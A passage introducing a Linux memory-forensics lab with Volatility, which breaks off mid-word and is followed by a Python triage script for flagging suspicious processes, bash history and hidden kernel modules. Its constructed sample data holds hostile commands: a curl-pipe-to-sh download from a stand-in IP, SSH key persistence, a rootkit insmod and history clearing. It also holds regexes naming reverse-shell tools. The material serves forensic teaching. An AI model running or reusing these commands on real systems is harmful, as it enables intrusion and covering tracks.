Introduction

In this forensic investigation, we will analyze a compromised Linux system by examining its memory dump using Volatility, a widely used memory forensics framework. As a security analyst, your task is to uncover the details of an attack, including the attacker's entry point, persistence mechanisms, and any hidden backdoors left behind. Memory forensics is a crucial technique in incident response: it lets analysts recover volatile data such as running processes, network connections, and in-memory system modifications that never reach the disk and are therefore invisible to traditional disk-based analysis. The investigation begins with identifying system details, such as the Linux distribution and kernel version, because Volatility can only parse a Linux dump with a symbol table that matches the exact kernel build it was taken from. By extracting Bash history from memory, we can reconstruct the commands that were executed, revealing the attacker's activities and the payloads they deployed, even when the on-disk history file has been cleared. Advanced attackers often attempt to erase traces of their presence, but by analyzing process hierarchies we can detect anomalies such as unauthorized scripts, rogue network connections, or unexpected privilege escalation attempts (for example, a shell spawned by a web server process).

As we dive deeper, we will uncover how the attacker established persistence, possibly using SSH-based methods or other modifications to files on disk. Kernel-level threats, such as rootkits, may be deployed to manipulate system behavior and evade detection. By inspecting the system call table and the list of loaded kernel modules, we can detect malicious alterations (hooked syscalls, modules hidden from the module list) that indicate a sophisticated compromise. Additionally, we will analyze encrypted data used by the attacker to conceal critical information, such as backdoor credentials or command-and-control (C2) communication. This lab will challenge your forensic analysis skills by requiring you to piece togeth
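The triage steps these two paragraphs describe (reconstructing command history, walking the process tree for anomalies, and cross-checking the loaded-module list for hidden rootkit modules), as an added worked example in Python. This is not BlueYard's lab material or Volatility's own code. It assumes the plugin output was first saved to text, e.g. `vol -f memdump.lime linux.pstree.PsTree > pstree.txt` and likewise for `linux.bash.Bash` and `linux.lsmod.Lsmod`, after `banners.Banners` has been used to confirm the kernel build and obtain a matching symbol table; `linux.check_modules.Check_modules` and `linux.check_syscall.Check_syscall` are the plugins that perform the rootkit checks directly. The sample tables embedded in the script are constructed to mimic Volatility 3's tab-separated text renderer, and the file name `memdump.lime`, the indicator lists and the regexes are this example's own choices, not something the lab specifies.

```python
"""Triage helpers for saved Volatility 3 Linux plugin output.

Added example (not BlueYard's or Volatility's code). The sample tables are
constructed and mimic the tab-separated layout of Volatility 3's text
renderer; column names can differ between releases, so check your headers.
"""
import re
from typing import Dict, List, Set, Tuple

Row = Dict[str, str]

# --- constructed sample plugin output (no real incident data) ---------------
PSTREE_TXT = """\
PID\tPPID\tCOMM
1\t0\tsystemd
* 812\t1\tsshd
** 2201\t812\tsshd
*** 2210\t2201\tbash
* 905\t1\tapache2
** 1460\t905\tapache2
*** 1473\t1460\tsh
**** 1474\t1473\tnc
"""

BASH_TXT = """\
PID\tProcess\tCommandTime\tCommand
2210\tbash\t2024-03-02 10:14:03.000000 \tls -la /var/www
2210\tbash\t2024-03-02 10:15:11.000000 \tcurl -s http://198.51.100.7/p.sh | sh
2210\tbash\t2024-03-02 10:15:40.000000 \techo 'ssh-rsa AAAAB3Nz...' >> /root/.ssh/authorized_keys
2210\tbash\t2024-03-02 10:16:02.000000 \tinsmod /tmp/.x/rk.ko
2210\tbash\t2024-03-02 10:16:30.000000 \thistory -c
"""

LSMOD_TXT = """\
Offset\tName\tSize
0xffffffffc0a1e040\text4\t774144
0xffffffffc09c0040\tvirtio_net\t61440
"""

# Module directories observed under /sys/module in the dump (constructed).
SYSFS_MODULES: Set[str] = {"ext4", "virtio_net", "rk"}

SHELLS = {"sh", "bash", "dash", "zsh"}
NET_TOOLS = {"nc", "ncat", "socat"}
NETWORK_DAEMONS = {"apache2", "httpd", "nginx", "php-fpm", "java", "mysqld", "postgres"}

# (regex, label) pairs: a hypothetical indicator list, extend for your case.
HISTORY_PATTERNS: List[Tuple[str, str]] = [
    (r"\b(curl|wget)\b.*\|\s*(ba)?sh\b", "download-and-execute"),
    (r"authorized_keys", "ssh key persistence"),
    (r"\b(insmod|modprobe)\b", "kernel module load"),
    (r"/dev/tcp/|\bnc\b.*\s-e\s|\bncat\b", "reverse shell"),
    (r"\bhistory -c\b|\bunset HISTFILE\b|HISTSIZE=0", "anti-forensics"),
    (r"\bbase64 -d\b|\bopenssl enc -d\b", "decoding concealed data"),
]


def parse_table(text: str) -> List[Row]:
    """Parse a Volatility 3 text table: header row, then tab-separated cells.
    pstree prefixes the first column with '*' depth markers; strip them."""
    lines = [ln for ln in text.splitlines() if ln.strip()]
    header = lines[0].split("\t")
    rows = []
    for line in lines[1:]:
        cells = [c.strip() for c in line.split("\t")]
        cells[0] = cells[0].lstrip("* ")
        rows.append(dict(zip(header, cells)))
    return rows


def suspicious_process_chains(pstree_rows: List[Row]) -> List[Tuple[int, str]]:
    """Flag shells and network tools whose ancestry includes a network-facing
    daemon (web-shell / reverse-shell pattern). Returns (pid, chain) pairs."""
    by_pid = {int(r["PID"]): r for r in pstree_rows}
    findings = []
    for r in pstree_rows:
        pid, comm = int(r["PID"]), r["COMM"]
        if comm not in SHELLS | NET_TOOLS:
            continue
        chain, cur, seen = [comm], int(r["PPID"]), {pid}
        while cur in by_pid and cur not in seen:   # walk up to PID 1 / unknown parent
            seen.add(cur)
            chain.append(by_pid[cur]["COMM"])
            cur = int(by_pid[cur]["PPID"])
        if any(a in NETWORK_DAEMONS for a in chain[1:]):
            findings.append((pid, " <- ".join(chain)))
    return findings


def flag_history(bash_rows: List[Row]) -> List[Tuple[int, str, str]]:
    """Match bash history recovered from memory against tradecraft patterns."""
    hits = []
    for r in bash_rows:
        for pattern, label in HISTORY_PATTERNS:
            if re.search(pattern, r["Command"]):
                hits.append((int(r["PID"]), label, r["Command"]))
    return hits


def hidden_modules(lsmod_rows: List[Row], sysfs_names: Set[str]) -> List[str]:
    """Modules with a /sys/module entry but no entry in the kernel module list:
    the classic sign of an LKM rootkit that unlinked itself. This is the same
    cross-view comparison that linux.check_modules performs."""
    listed = {r["Name"] for r in lsmod_rows}
    return sorted(sysfs_names - listed)


def triage() -> dict:
    """Run all three checks over the embedded sample output."""
    return {
        "process_chains": suspicious_process_chains(parse_table(PSTREE_TXT)),
        "history_hits": flag_history(parse_table(BASH_TXT)),
        "hidden_modules": hidden_modules(parse_table(LSMOD_TXT), SYSFS_MODULES),
    }


if __name__ == "__main__":
    for section, items in triage().items():
        print(f"== {section} ==")
        for item in items:
            print("  ", item)
```

On the constructed sample the script flags the `sh` and `nc` processes descended from `apache2` but not the `bash` login under `sshd`, attributes four of the five history lines to download-and-execute, SSH key persistence, a kernel module load and anti-forensics, and reports `rk` as a module visible in sysfs but absent from the module list. The history check is deliberately keyed on the in-memory history rather than `~/.bash_history`, since the final `history -c` would have emptied the on-disk file.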
